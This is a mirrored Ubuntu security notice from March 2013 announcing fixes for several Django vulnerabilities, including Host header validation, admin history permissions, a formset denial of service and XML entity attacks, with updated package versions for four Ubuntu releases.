Home / mailings [USN-1757-1] Django vulnerabilities
Posted on 07 March 2013
Ubuntu Security==========================
==========================
========================
Ubuntu Security Notice USN-1757-1
March 07, 2013
python-django vulnerabilities
==========================
==========================
========================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Django.
Software Description:
- python-django: High-level Python web development framework
Details:
James Kettle discovered that Django did not properly filter the Host HTTP=
header when processing certain requests. An attacker could exploit this t=
o
generate and display arbitrary URLs to users. Although this issue had bee=
n
previously addressed in USN-1632-1, this update adds additional hardening=
measures to host header validation. This update also adds a new
ALLOWED_HOSTS setting that can be set to a list of acceptable values for
headers. (CVE-2012-4520)
Orange Tsai discovered that Django incorrectly performed permission check=
s
when displaying the history view in the admin interface. An administrator=
could use this flaw to view the history of any object, regardless of
intended permissions. (CVE-2013-0305)
It was discovered that Django incorrectly handled a large number of forms=
when generating formsets. An attacker could use this flaw to cause Django=
to consume memory, resulting in a denial of service. (CVE-2013-0306)
It was discovered that Django incorrectly deserialized XML. An attacker
could use this flaw to perform entity-expansion and external-entity/DTD
attacks. This updated modified Django behaviour to no longer allow DTDs,
perform entity expansion, or fetch external entities/DTDs. (CVE-2013-1664=
,
CVE-2013-1665)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
python-django 1.4.1-2ubuntu0.3
Ubuntu 12.04 LTS:
python-django 1.3.1-4ubuntu1.6
Ubuntu 11.10:
python-django 1.3-2ubuntu1.6
Ubuntu 10.04 LTS:
python-django 1.1.1-2ubuntu1.8
In general, a standard system update will make all the necessary changes.=
References:
http://www.ubuntu.com/usn/usn-1757-1
CVE-2012-4520, CVE-2013-0305, CVE-2013-0306, CVE-2013-1664,
CVE-2013-1665
Package Information:
https://launchpad.net/ubuntu/+source/python-django/1.4.1-2ubuntu0.3
https://launchpad.net/ubuntu/+source/python-django/1.3.1-4ubuntu1.6
https://launchpad.net/ubuntu/+source/python-django/1.3-2ubuntu1.6
https://launchpad.net/ubuntu/+source/python-django/1.1.1-2ubuntu1.8
------------
